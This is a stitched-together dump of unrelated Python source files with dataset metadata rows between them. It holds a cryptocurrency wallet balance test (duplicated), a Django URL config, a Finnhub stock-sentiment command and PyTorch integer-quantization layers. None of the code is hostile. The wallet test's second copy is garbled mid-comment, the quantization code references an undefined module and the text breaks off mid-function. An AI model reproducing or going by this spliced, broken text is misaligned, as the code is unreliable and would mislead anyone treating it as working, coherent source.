# 2) Sent 60 from node B to node A with fee 0.01
#
# Then we check the balances:
#
# 1) As is
# 2) With transaction 2 from above with 2x the fee
#
# Prior to #16766, in this situation, the node would immediately report
# a balance of 30 on node B as unconfirmed and trusted.
#
# After #16766, we show that balance as unconfirmed.
#
# The balance is indeed "trusted" and "confirmed" insofar as removing
# the mempool transactions would return at least that much money. But
# the algorithm after #16766 marks it as unconfirmed because the 'taint'
# tracking of transaction trust for summing balances doesn't consider
# which inputs belong to a user. In this case, the change output in
# question could be "destroyed" by replace the 1st transaction above.
#
# The post #16766 behavior is correct; we shouldn't be treating those
# funds as confirmed. If you want to rely on that specific UTXO existing
# which has given you that balance, you cannot, as a third party
# spending the other input would destroy that unconfirmed.
#
# For example, if the test transactions were:
#
# 1) Sent 40 from node A to node B with fee 0.01
# 2) Sent 10 from node B to node A with fee 0.01
#
# Then our node would report a confirmed balance of 40 + 50 - 10 = 80
# BTR, which is more than would be available if transaction 1 were
# replaced.
def test_balances(*, fee_node_1=0):
# getbalance without any arguments includes unconfirmed transactions, but not untrusted transactions
assert_equal(self.nodes[0].getbalance(), Decimal('9.99')) # change from node 0's send
assert_equal(self.nodes[1].getbalance(), Decimal('0')) # node 1's send had an unsafe input
# Same with minconf=0
assert_equal(self.nodes[0].getbalance(minconf=0), Decimal('9.99'))
assert_equal(self.nodes[1].getbalance(minconf=0), Decimal('0'))
# getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
# TODO: fix getbalance tracking of coin spentness depth
assert_equal(self.nodes[0].getbalance(minconf=1), Decimal('0'))
assert_equal(self.nodes[1].getbalance(minconf=1), Decimal('0'))
# getunconfirmedbalance
assert_equal(self.nodes[0].getunconfirmedbalance(), Decimal('60')) # output of node 1's spend
assert_equal(self.nodes[0].getbalances()['mine']['untrusted_pending'], Decimal('60'))
assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], Decimal('60'))
assert_equal(self.nodes[1].getunconfirmedbalance(), Decimal('30') - fee_node_1) # Doesn't include output of node 0's send since it was spent
assert_equal(self.nodes[1].getbalances()['mine']['untrusted_pending'], Decimal('30') - fee_node_1)
assert_equal(self.nodes[1].getwalletinfo()["unconfirmed_balance"], Decimal('30') - fee_node_1)
test_balances(fee_node_1=Decimal('0.01'))
# Node 1 bumps the transaction fee and resends
self.nodes[1].sendrawtransaction(txs[1]['hex'])
self.nodes[0].sendrawtransaction(txs[1]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
self.log.info("Test getbalance and getunconfirmedbalance with conflicted unconfirmed inputs")
test_balances(fee_node_1=Decimal('0.02'))
self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
self.sync_all()
# balances are correct after the transactions are confirmed
assert_equal(self.nodes[0].getbalance(), Decimal('69.99')) # node 1's send plus change from node 0's send
assert_equal(self.nodes[1].getbalance(), Decimal('29.98')) # change from node 0's send
# Send total balance away from node 1
txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), Decimal('29.97'), [Decimal('0.01')])
self.nodes[1].sendrawtransaction(txs[0]['hex'])
self.nodes[1].generatetoaddress(2, ADDRESS_WATCHONLY)
self.sync_all()
# getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
# TODO: fix getbalance tracking of coin spentness depth
# getbalance with minconf=3 should still show the old balance
assert_equal(self.nodes[1].getbalance(minconf=3), Decimal('0'))
# getbalance with minconf=2 will show the new balance.
assert_equal(self.nodes[1].getbalance(minconf=2), Decimal('0'))
# check mempool transactions count for wallet unconfirmed balance after
# dynamically loading the wallet.
before = self.nodes[1].getunconfirmedbalance()
dst = self.nodes[1].getnewaddress()
self.nodes[1].unloadwallet('')
self.nodes[0].sendtoaddress(dst, 0.1)
self.sync_all()
self.nodes[1].loadwallet('')
after = self.nodes[1].getunconfirmedbalance()
assert_equal(before + Decimal('0.1'), after)
# Create 3 more wallet txs, where the last is not accepted to the
# mempool because it is the third descendant of the tx above
for _ in range(3):
# Set amount high enough such that all coins are spent by each tx
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 99)
self.log.info('Check that wallet txs not in the mempool are untrusted')
assert txid not in self.nodes[0].getrawmempool()
assert_equal(self.nodes[0].gettransaction(txid)['trusted'], False)
assert_equal(self.nodes[0].getbalance(minconf=0), 0)
self.log.info("Test replacement and reorg of non-mempool tx")
tx_orig = self.nodes[0].gettransaction(txid)['hex']
# Increase fee by 1 coin
tx_replace = tx_orig.replace(
struct.pack("<q", 99 * 10**8).hex(),
struct.pack("<q", 98 * 10**8).hex(),
)
tx_replace = self.nodes[0].signrawtransactionwithwallet(tx_replace)['hex']
# Total balance is given by the sum of outputs of the tx
total_amount = sum([o['value'] for o in self.nodes[0].decoderawtransaction(tx_replace)['vout']])
self.sync_all()
self.nodes[1].sendrawtransaction(hexstring=tx_replace, maxfeerate=0)
# Now confirm tx_replace
block_reorg = self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)[0]
self.sync_all()
assert_equal(self.nodes[0].getbalance(minconf=0), total_amount)
self.log.info('Put txs back into mempool of node 1 (not node 0)')
self.nodes[0].invalidateblock(block_reorg)
self.nodes[1].invalidateblock(block_reorg)
self.sync_blocks()
self.nodes[0].syncwithvalidationinterfacequeue()
assert_equal(self.nodes[0].getbalance(minconf=0), 0) # wallet txs not in the mempool are untrusted
self.nodes[0].generatetoaddress(1, ADDRESS_WATCHONLY)
assert_equal(self.nodes[0].getbalance(minconf=0), 0) # wallet txs not in the mempool are untrusted
# Now confirm tx_orig
self.restart_node(1, ['-persistmempool=0'])
connect_nodes(self.nodes[0], 1)
sync_blocks(self.nodes)
self.nodes[1].sendrawtransaction(tx_orig)
self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalance(minconf=0), total_amount + 1) # The reorg recovered our fee of 1 coin
if __name__ == '__main__':
WalletTest().main()
| 47.572519
| 153
| 0.656611
|
from decimal import Decimal
import struct
from test_framework.address import ADDRESS_BCRT1_UNSPENDABLE as ADDRESS_WATCHONLY
from test_framework.test_framework import BitRubTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
connect_nodes,
sync_blocks,
)
def create_transactions(node, address, amt, fees):
utxos = [u for u in node.listunspent(0) if u['spendable']]
inputs = []
ins_total = 0
for utxo in utxos:
inputs.append({"txid": utxo["txid"], "vout": utxo["vout"]})
ins_total += utxo['amount']
if ins_total >= amt + max(fees):
break
assert ins_total >= amt + max(fees)
txs = []
for fee in fees:
outputs = {address: amt}
if ins_total > amt + fee:
outputs[node.getrawchangeaddress()] = ins_total - amt - fee
raw_tx = node.createrawtransaction(inputs, outputs, 0, True)
raw_tx = node.signrawtransactionwithwallet(raw_tx)
assert_equal(raw_tx['complete'], True)
txs.append(raw_tx)
return txs
class WalletTest(BitRubTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [
['-limitdescendantcount=3'],
[],
]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.nodes[0].importaddress(ADDRESS_WATCHONLY)
assert_equal(len(self.nodes[0].listunspent()), 0)
assert_equal(len(self.nodes[1].listunspent()), 0)
self.log.info("Check that only node 0 is watching an address")
assert 'watchonly' in self.nodes[0].getbalances()
assert 'watchonly' not in self.nodes[1].getbalances()
self.log.info("Mining blocks ...")
self.nodes[0].generate(1)
self.sync_all()
self.nodes[1].generate(1)
self.nodes[1].generatetoaddress(101, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalances()['mine']['trusted'], 50)
assert_equal(self.nodes[0].getwalletinfo()['balance'], 50)
assert_equal(self.nodes[1].getbalances()['mine']['trusted'], 50)
assert_equal(self.nodes[0].getbalances()['watchonly']['immature'], 5000)
assert 'watchonly' not in self.nodes[1].getbalances()
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
self.log.info("Test getbalance with different arguments")
assert_equal(self.nodes[0].getbalance("*"), 50)
assert_equal(self.nodes[0].getbalance("*", 1), 50)
assert_equal(self.nodes[0].getbalance("*", 1, True), 100)
assert_equal(self.nodes[0].getbalance(minconf=1), 50)
assert_equal(self.nodes[0].getbalance(minconf=0, include_watchonly=True), 100)
assert_equal(self.nodes[1].getbalance(minconf=0, include_watchonly=True), 50)
# Send 40 BTR from 0 to 1 and 60 BTR from 1 to 0.
txs = create_transactions(self.nodes[0], self.nodes[1].getnewaddress(), 40, [Decimal('0.01')])
self.nodes[0].sendrawtransaction(txs[0]['hex'])
self.nodes[1].sendrawtransaction(txs[0]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), 60, [Decimal('0.01'), Decimal('0.02')])
self.nodes[1].sendrawtransaction(txs[0]['hex'])
self.nodes[0].sendrawtransaction(txs[0]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
# First argument of getbalance must be set to "*"
assert_raises_rpc_error(-32, "dummy first argument must be excluded or set to \"*\"", self.nodes[1].getbalance, "")
self.log.info("Test getbalance and getunconfirmedbalance with unconfirmed inputs")
# Before `test_balance()`, we have had two nodes with a balance of 50
# each and then we:
#
# 1) Sent 40 from node A to node B with fee 0.01
# 2) Sent 60 from node B to node A with fee 0.01
#
# Then we check the balances:
#
# 1) As is
# 2) With transaction 2 from above with 2x the fee
#
# Prior to #16766, in this situation, the node would immediately report
# a balance of 30 on node B as unconfirmed and trusted.
#
# After #16766, we show that balance as unconfirmed.
#
# The balance is indeed "trusted" and "confirmed" insofar as removing
# the mempool transactions would return at least that much money. But
# the algorithm after #16766 marks it as unconfirmed because the 'taint'
# tracking of transaction trust for summing balances doesn't consider
specific UTXO existing
# which has given you that balance, you cannot, as a third party
# spending the other input would destroy that unconfirmed.
#
# For example, if the test transactions were:
#
# 1) Sent 40 from node A to node B with fee 0.01
# 2) Sent 10 from node B to node A with fee 0.01
#
# Then our node would report a confirmed balance of 40 + 50 - 10 = 80
# BTR, which is more than would be available if transaction 1 were
# replaced.
def test_balances(*, fee_node_1=0):
# getbalance without any arguments includes unconfirmed transactions, but not untrusted transactions
assert_equal(self.nodes[0].getbalance(), Decimal('9.99')) # change from node 0's send
assert_equal(self.nodes[1].getbalance(), Decimal('0'))
# Same with minconf=0
assert_equal(self.nodes[0].getbalance(minconf=0), Decimal('9.99'))
assert_equal(self.nodes[1].getbalance(minconf=0), Decimal('0'))
# getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
# TODO: fix getbalance tracking of coin spentness depth
assert_equal(self.nodes[0].getbalance(minconf=1), Decimal('0'))
assert_equal(self.nodes[1].getbalance(minconf=1), Decimal('0'))
# getunconfirmedbalance
assert_equal(self.nodes[0].getunconfirmedbalance(), Decimal('60')) # output of node 1's spend
assert_equal(self.nodes[0].getbalances()['mine']['untrusted_pending'], Decimal('60'))
assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], Decimal('60'))
assert_equal(self.nodes[1].getunconfirmedbalance(), Decimal('30') - fee_node_1)
assert_equal(self.nodes[1].getbalances()['mine']['untrusted_pending'], Decimal('30') - fee_node_1)
assert_equal(self.nodes[1].getwalletinfo()["unconfirmed_balance"], Decimal('30') - fee_node_1)
test_balances(fee_node_1=Decimal('0.01'))
self.nodes[1].sendrawtransaction(txs[1]['hex'])
self.nodes[0].sendrawtransaction(txs[1]['hex'])
self.sync_all()
self.log.info("Test getbalance and getunconfirmedbalance with conflicted unconfirmed inputs")
test_balances(fee_node_1=Decimal('0.02'))
self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), Decimal('69.99'))
assert_equal(self.nodes[1].getbalance(), Decimal('29.98'))
# Send total balance away from node 1
txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), Decimal('29.97'), [Decimal('0.01')])
self.nodes[1].sendrawtransaction(txs[0]['hex'])
self.nodes[1].generatetoaddress(2, ADDRESS_WATCHONLY)
self.sync_all()
# getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
# TODO: fix getbalance tracking of coin spentness depth
# getbalance with minconf=3 should still show the old balance
assert_equal(self.nodes[1].getbalance(minconf=3), Decimal('0'))
# getbalance with minconf=2 will show the new balance.
assert_equal(self.nodes[1].getbalance(minconf=2), Decimal('0'))
# check mempool transactions count for wallet unconfirmed balance after
# dynamically loading the wallet.
before = self.nodes[1].getunconfirmedbalance()
dst = self.nodes[1].getnewaddress()
self.nodes[1].unloadwallet('')
self.nodes[0].sendtoaddress(dst, 0.1)
self.sync_all()
self.nodes[1].loadwallet('')
after = self.nodes[1].getunconfirmedbalance()
assert_equal(before + Decimal('0.1'), after)
# Create 3 more wallet txs, where the last is not accepted to the
# mempool because it is the third descendant of the tx above
for _ in range(3):
# Set amount high enough such that all coins are spent by each tx
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 99)
self.log.info('Check that wallet txs not in the mempool are untrusted')
assert txid not in self.nodes[0].getrawmempool()
assert_equal(self.nodes[0].gettransaction(txid)['trusted'], False)
assert_equal(self.nodes[0].getbalance(minconf=0), 0)
self.log.info("Test replacement and reorg of non-mempool tx")
tx_orig = self.nodes[0].gettransaction(txid)['hex']
# Increase fee by 1 coin
tx_replace = tx_orig.replace(
struct.pack("<q", 99 * 10**8).hex(),
struct.pack("<q", 98 * 10**8).hex(),
)
tx_replace = self.nodes[0].signrawtransactionwithwallet(tx_replace)['hex']
# Total balance is given by the sum of outputs of the tx
total_amount = sum([o['value'] for o in self.nodes[0].decoderawtransaction(tx_replace)['vout']])
self.sync_all()
self.nodes[1].sendrawtransaction(hexstring=tx_replace, maxfeerate=0)
# Now confirm tx_replace
block_reorg = self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)[0]
self.sync_all()
assert_equal(self.nodes[0].getbalance(minconf=0), total_amount)
self.log.info('Put txs back into mempool of node 1 (not node 0)')
self.nodes[0].invalidateblock(block_reorg)
self.nodes[1].invalidateblock(block_reorg)
self.sync_blocks()
self.nodes[0].syncwithvalidationinterfacequeue()
assert_equal(self.nodes[0].getbalance(minconf=0), 0) # wallet txs not in the mempool are untrusted
self.nodes[0].generatetoaddress(1, ADDRESS_WATCHONLY)
assert_equal(self.nodes[0].getbalance(minconf=0), 0) # wallet txs not in the mempool are untrusted
# Now confirm tx_orig
self.restart_node(1, ['-persistmempool=0'])
connect_nodes(self.nodes[0], 1)
sync_blocks(self.nodes)
self.nodes[1].sendrawtransaction(tx_orig)
self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalance(minconf=0), total_amount + 1) # The reorg recovered our fee of 1 coin
if __name__ == '__main__':
WalletTest().main()
| true
| true
|
f719173f8124d167cfa365f834dbc8b7c61362f6
| 247
|
py
|
Python
|
insurance/urls.py
|
paulohenriquesi/origin_python
|
f8f824ccda46a66da93e43bb269803b0d0ee7c99
|
[
"MIT"
] | null | null | null |
insurance/urls.py
|
paulohenriquesi/origin_python
|
f8f824ccda46a66da93e43bb269803b0d0ee7c99
|
[
"MIT"
] | 3
|
2021-03-19T01:18:39.000Z
|
2021-04-08T19:55:26.000Z
|
insurance/urls.py
|
paulohenriquesi/origin_python
|
f8f824ccda46a66da93e43bb269803b0d0ee7c99
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.urls import path, include
from api import views
urlpatterns = [
path('admin/', admin.site.urls),
path('api-auth/', include('rest_framework.urls')),
path('riskcalc', views.calculate_risk)
]
| 24.7
| 54
| 0.716599
|
from django.contrib import admin
from django.urls import path, include
from api import views
urlpatterns = [
path('admin/', admin.site.urls),
path('api-auth/', include('rest_framework.urls')),
path('riskcalc', views.calculate_risk)
]
| true
| true
|
f719184d0965b1afb362f1bed12ae11aa08d5a1a
| 2,600
|
py
|
Python
|
gamestonk_terminal/behavioural_analysis/finnhub_view.py
|
shanedrinion/GamestonkTerminal
|
baf36aa7c96de6918911c7a263cf5ac9648b27e3
|
[
"MIT"
] | 1
|
2021-12-17T19:25:12.000Z
|
2021-12-17T19:25:12.000Z
|
gamestonk_terminal/behavioural_analysis/finnhub_view.py
|
lolrenx/GamestonkTerminal
|
eb2b0d766bf1b6bb8656d6733083962efb152fe2
|
[
"MIT"
] | 1
|
2021-04-20T00:26:20.000Z
|
2021-04-20T00:26:20.000Z
|
gamestonk_terminal/behavioural_analysis/finnhub_view.py
|
lolrenx/GamestonkTerminal
|
eb2b0d766bf1b6bb8656d6733083962efb152fe2
|
[
"MIT"
] | null | null | null |
import argparse
from typing import List, Dict
import requests
from gamestonk_terminal import config_terminal as cfg
from gamestonk_terminal.helper_funcs import (
parse_known_args_and_warn,
)
def get_sentiment_stats(ticker: str) -> Dict:
"""Get sentiment stats
Parameters
----------
ticker : str
Ticker to get sentiment stats
Returns
-------
Dict
Get sentiment stats
"""
response = requests.get(
f"https://finnhub.io/api/v1/news-sentiment?symbol={ticker}&token={cfg.API_FINNHUB_KEY}"
)
if response.status_code == 200:
return response.json()
return {}
def sentiment_stats(other_args: List[str], ticker: str):
"""Sentiment stats which displays buzz, news score, articles last week, articles weekly average,
bullish vs bearish percentages, sector average bullish percentage, and sector average news score
Parameters
----------
other_args : List[str]
Command line arguments to be processed with argparse
ticker : str
Ticker to get sentiment stats
"""
parser = argparse.ArgumentParser(
add_help=False,
prog="stats",
description="""
Sentiment stats which displays buzz, news score, articles last week, articles weekly average,
bullish vs bearish percentages, sector average bullish percentage, and sector average news score.
[Source: https://finnhub.io]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
d_stats = get_sentiment_stats(ticker)
if d_stats:
print(f"Buzz: {round(100*d_stats['buzz']['buzz'],2)} %")
print(f"News Score: {round(100*d_stats['companyNewsScore'],2)} %")
print("")
print(f"Articles Last Week: {d_stats['buzz']['articlesInLastWeek']}")
print(f"Articles Weekly Average: {d_stats['buzz']['weeklyAverage']}")
print("")
print(f"Bullish: {round(100*d_stats['sentiment']['bullishPercent'],2)} %")
print(f"Bearish: {round(100*d_stats['sentiment']['bearishPercent'],2)} %")
print("")
print(
f"Sector Average Bullish: {round(100*d_stats['sectorAverageBullishPercent'],2)} %"
)
print(
f"Sector Average News Score: {round(100*d_stats['sectorAverageNewsScore'],2)} %"
)
else:
print("No sentiment stats found.")
print("")
except Exception as e:
print(e, "\n")
| 31.325301
| 109
| 0.609231
|
import argparse
from typing import List, Dict
import requests
from gamestonk_terminal import config_terminal as cfg
from gamestonk_terminal.helper_funcs import (
parse_known_args_and_warn,
)
def get_sentiment_stats(ticker: str) -> Dict:
response = requests.get(
f"https://finnhub.io/api/v1/news-sentiment?symbol={ticker}&token={cfg.API_FINNHUB_KEY}"
)
if response.status_code == 200:
return response.json()
return {}
def sentiment_stats(other_args: List[str], ticker: str):
parser = argparse.ArgumentParser(
add_help=False,
prog="stats",
description="""
Sentiment stats which displays buzz, news score, articles last week, articles weekly average,
bullish vs bearish percentages, sector average bullish percentage, and sector average news score.
[Source: https://finnhub.io]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
d_stats = get_sentiment_stats(ticker)
if d_stats:
print(f"Buzz: {round(100*d_stats['buzz']['buzz'],2)} %")
print(f"News Score: {round(100*d_stats['companyNewsScore'],2)} %")
print("")
print(f"Articles Last Week: {d_stats['buzz']['articlesInLastWeek']}")
print(f"Articles Weekly Average: {d_stats['buzz']['weeklyAverage']}")
print("")
print(f"Bullish: {round(100*d_stats['sentiment']['bullishPercent'],2)} %")
print(f"Bearish: {round(100*d_stats['sentiment']['bearishPercent'],2)} %")
print("")
print(
f"Sector Average Bullish: {round(100*d_stats['sectorAverageBullishPercent'],2)} %"
)
print(
f"Sector Average News Score: {round(100*d_stats['sectorAverageNewsScore'],2)} %"
)
else:
print("No sentiment stats found.")
print("")
except Exception as e:
print(e, "\n")
| true
| true
|
f71918615f3a215dc0bc915794b798facde5f6a8
| 22,397
|
py
|
Python
|
qnarre/models/ibert_quant_modules.py
|
quantapix/qnarre.com
|
f51d5945c20ef8182c4aa11f1b407d064c190c70
|
[
"MIT"
] | null | null | null |
qnarre/models/ibert_quant_modules.py
|
quantapix/qnarre.com
|
f51d5945c20ef8182c4aa11f1b407d064c190c70
|
[
"MIT"
] | null | null | null |
qnarre/models/ibert_quant_modules.py
|
quantapix/qnarre.com
|
f51d5945c20ef8182c4aa11f1b407d064c190c70
|
[
"MIT"
] | null | null | null |
import decimal
import numpy as np
import torch
from torch import nn
from torch.autograd import Function
from ...utils import logging
logger = logging.get_logger(__name__)
class QuantEmbedding(qc.Module):
def __init__(
self,
num_embeddings,
embedding_dim,
padding_idx=None,
max_norm=None,
norm_type=2.0,
scale_grad_by_freq=False,
sparse=False,
_weight=None,
weight_bit=8,
momentum=0.95,
quant_mode=False,
):
super().__init__()
self.num_ = num_embeddings
self.dim = embedding_dim
self.padding_idx = padding_idx
self.max_norm = max_norm
self.norm_type = norm_type
self.scale_grad_by_freq = scale_grad_by_freq
self.sparse = sparse
self.weight = nn.Parameter(torch.zeros([num_embeddings, embedding_dim]))
self.register_buffer("weight_scaling_factor", torch.zeros(1))
self.register_buffer("weight_integer", torch.zeros_like(self.weight))
self.weight_bit = weight_bit
self.momentum = momentum
self.quant_mode = quant_mode
self.percentile_mode = False
self.weight_function = SymmetricQuantFunction.apply
def forward(self, x, positions=None, incremental_state=None):
if not self.quant_mode:
return (
F.embedding(
x,
self.weight,
self.padding_idx,
self.max_norm,
self.norm_type,
self.scale_grad_by_freq,
self.sparse,
),
None,
)
w = self.weight
w_transform = w.data.detach()
w_min = w_transform.min().expand(1)
w_max = w_transform.max().expand(1)
self.weight_scaling_factor = symmetric_linear_quantization_params(
self.weight_bit, w_min, w_max, False
)
self.weight_integer = self.weight_function(
self.weight, self.weight_bit, self.percentile_mode, self.weight_scaling_factor
)
emb_int = F.embedding(
x,
self.weight_integer,
self.padding_idx,
self.max_norm,
self.norm_type,
self.scale_grad_by_freq,
self.sparse,
)
return emb_int * self.weight_scaling_factor, self.weight_scaling_factor
class QuantAct(qc.Module):
def __init__(
self,
activation_bit,
act_range_momentum=0.95,
per_channel=False,
channel_len=None,
quant_mode=False,
):
super().__init__()
self.activation_bit = activation_bit
self.act_range_momentum = act_range_momentum
self.quant_mode = quant_mode
self.per_channel = per_channel
self.percentile = False
self.act_function = SymmetricQuantFunction.apply
if not self.per_channel:
self.register_buffer("x_min", torch.zeros(1))
self.register_buffer("x_max", torch.zeros(1))
self.register_buffer("act_scaling_factor", torch.zeros(1))
self.x_min -= 1e-5
self.x_max += 1e-5
else:
raise NotImplementedError("per-channel mode is not currently supported for activation.")
def __repr__(self):
return (
f"{self.__class__.__name__}(activation_bit={self.activation_bit}, "
f"quant_mode: {self.activation_bit}, Act_min: {self.x_min.item():.2f}, "
f"Act_max: {self.x_max.item():.2f})"
)
def forward(
self,
x,
pre_act_scaling_factor=None,
identity=None,
identity_scaling_factor=None,
specified_min=None,
specified_max=None,
):
x_act = x if identity is None else identity + x
# collect running stats if training
if self.training:
assert not self.percentile, "percentile mode is not currently supported for activation."
assert (
not self.per_channel
), "per-channel mode is not currently supported for activation."
x_min = x_act.data.min()
x_max = x_act.data.max()
assert (
x_max.isnan().sum() == 0 and x_min.isnan().sum() == 0
), "NaN detected when computing min/max of the activation"
# Initialization
if self.x_min.min() > -1.1e-5 and self.x_max.max() < 1.1e-5:
self.x_min = self.x_min + x_min
self.x_max = self.x_max + x_max
# exponential moving average (EMA)
# use momentum to prevent the quantized values change greatly every iteration
elif self.act_range_momentum == -1:
self.x_min = torch.min(self.x_min, x_min)
self.x_max = torch.max(self.x_max, x_max)
else:
self.x_min = self.x_min * self.act_range_momentum + x_min * (
1 - self.act_range_momentum
)
self.x_max = self.x_max * self.act_range_momentum + x_max * (
1 - self.act_range_momentum
)
if not self.quant_mode:
return x_act, None
x_min = self.x_min if specified_min is None else specified_min
x_max = self.x_max if specified_max is None else specified_max
self.act_scaling_factor = symmetric_linear_quantization_params(
self.activation_bit, x_min, x_max, per_channel=self.per_channel
)
if pre_act_scaling_factor is None:
# this is for the input quantization
quant_act_int = self.act_function(
x, self.activation_bit, self.percentile, self.act_scaling_factor
)
else:
quant_act_int = FixedPointMul.apply(
x,
pre_act_scaling_factor,
self.activation_bit,
self.act_scaling_factor,
identity,
identity_scaling_factor,
)
correct_output_scale = self.act_scaling_factor.view(-1)
return quant_act_int * correct_output_scale, self.act_scaling_factor
class QuantLinear(qc.Module):
def __init__(
self,
in_features,
out_features,
bias=True,
weight_bit=8,
bias_bit=32,
per_channel=False,
quant_mode=False,
):
super().__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = nn.Parameter(torch.zeros([out_features, in_features]))
self.register_buffer("weight_integer", torch.zeros_like(self.weight))
self.register_buffer("fc_scaling_factor", torch.zeros(self.out_features))
if bias:
self.bias = nn.Parameter(torch.zeros(out_features))
self.register_buffer("bias_integer", torch.zeros_like(self.bias))
self.weight_bit = weight_bit
self.quant_mode = quant_mode
self.per_channel = per_channel
self.bias_bit = bias_bit
self.quant_mode = quant_mode
self.percentile_mode = False
self.weight_function = SymmetricQuantFunction.apply
def __repr__(self):
s = super().__repr__()
s = f"({s} weight_bit={self.weight_bit}, quant_mode={self.quant_mode})"
return s
def forward(self, x, prev_act_scaling_factor=None):
if not self.quant_mode:
return F.linear(x, weight=self.weight, bias=self.bias), None
# assert that prev_act_scaling_factor is a scalar tensor
assert prev_act_scaling_factor is not None and prev_act_scaling_factor.shape == (1,), (
"Input activation to the QuantLinear layer should be globally (non-channel-wise) quantized. "
"Please add a QuantAct layer with `per_channel = True` before this QuantAct layer"
)
w = self.weight
w_transform = w.data.detach()
if self.per_channel:
w_min, _ = torch.min(w_transform, dim=1, out=None)
w_max, _ = torch.max(w_transform, dim=1, out=None)
else:
w_min = w_transform.min().expand(1)
w_max = w_transform.max().expand(1)
self.fc_scaling_factor = symmetric_linear_quantization_params(
self.weight_bit, w_min, w_max, self.per_channel
)
self.weight_integer = self.weight_function(
self.weight, self.weight_bit, self.percentile_mode, self.fc_scaling_factor
)
bias_scaling_factor = self.fc_scaling_factor * prev_act_scaling_factor
if self.bias is not None:
self.bias_integer = self.weight_function(
self.bias, self.bias_bit, False, bias_scaling_factor
)
prev_act_scaling_factor = prev_act_scaling_factor.view(1, -1)
x_int = x / prev_act_scaling_factor
return (
F.linear(x_int, weight=self.weight_integer, bias=self.bias_integer)
* bias_scaling_factor,
bias_scaling_factor,
)
class IntGELU(qc.Module):
def __init__(self, quant_mode=True, force_dequant="none"):
super().__init__()
self.quant_mode = quant_mode
if force_dequant in ["nonlinear", "gelu"]:
logger.info("Force dequantize gelu")
self.quant_mode = False
if not self.quant_mode:
self.activation_fn = nn.GELU()
self.k = 1.4142
self.const = 14 # dummy integer constant
self.coeff = [-0.2888, -1.769, 1] # a(x+b)**2 + c
self.coeff[2] /= self.coeff[0]
def int_erf(self, x_int, scaling_factor):
b_int = torch.floor(self.coeff[1] / scaling_factor)
c_int = torch.floor(self.coeff[2] / scaling_factor**2)
sign = torch.sign(x_int)
abs_int = torch.min(torch.abs(x_int), -b_int)
y_int = sign * ((abs_int + b_int) ** 2 + c_int)
scaling_factor = scaling_factor**2 * self.coeff[0]
# avoid overflow
y_int = floor_ste.apply(y_int / 2**self.const)
scaling_factor = scaling_factor * 2**self.const
return y_int, scaling_factor
def forward(self, x, scaling_factor=None):
if not self.quant_mode:
return self.activation_fn(x), None
x_int = x / scaling_factor
sigmoid_int, sigmoid_scaling_factor = self.int_erf(x_int, scaling_factor / self.k)
shift_int = 1.0 // sigmoid_scaling_factor
x_int = x_int * (sigmoid_int + shift_int)
scaling_factor = scaling_factor * sigmoid_scaling_factor / 2
return x_int * scaling_factor, scaling_factor
class IntSoftmax(qc.Module):
def __init__(self, output_bit, quant_mode=False, force_dequant="none"):
super().__init__()
self.output_bit = output_bit
self.max_bit = 32
self.quant_mode = quant_mode
if force_dequant in ["nonlinear", "softmax"]:
logger.info("Force dequantize softmax")
self.quant_mode = False
self.act = QuantAct(16, quant_mode=self.quant_mode)
self.x0 = -0.6931 # -ln2
self.const = 30 # dummy integer constant
self.coef = [0.35815147, 0.96963238, 1.0] # ax**2 + bx + c
self.coef[1] /= self.coef[0]
self.coef[2] /= self.coef[0]
def int_polynomial(self, x_int, scaling_factor):
with torch.no_grad():
b_int = torch.floor(self.coef[1] / scaling_factor)
c_int = torch.floor(self.coef[2] / scaling_factor**2)
z = (x_int + b_int) * x_int + c_int
scaling_factor = self.coef[0] * scaling_factor**2
return z, scaling_factor
def int_exp(self, x_int, scaling_factor):
with torch.no_grad():
x0_int = torch.floor(self.x0 / scaling_factor)
x_int = torch.max(x_int, self.const * x0_int)
q = floor_ste.apply(x_int / x0_int)
r = x_int - x0_int * q
exp_int, exp_scaling_factor = self.int_polynomial(r, scaling_factor)
exp_int = torch.clamp(floor_ste.apply(exp_int * 2 ** (self.const - q)), min=0)
scaling_factor = exp_scaling_factor / 2**self.const
return exp_int, scaling_factor
def forward(self, x, scaling_factor):
if not self.quant_mode:
return F.softmax(x, dim=-1), None
x_int = x / scaling_factor
x_int_max, _ = x_int.max(dim=-1, keepdim=True)
x_int = x_int - x_int_max
exp_int, exp_scaling_factor = self.int_exp(x_int, scaling_factor)
# Avoid overflow
exp, exp_scaling_factor = self.act(exp_int, exp_scaling_factor)
exp_int = exp / exp_scaling_factor
exp_int_sum = exp_int.sum(dim=-1, keepdim=True)
factor = floor_ste.apply(2**self.max_bit / exp_int_sum)
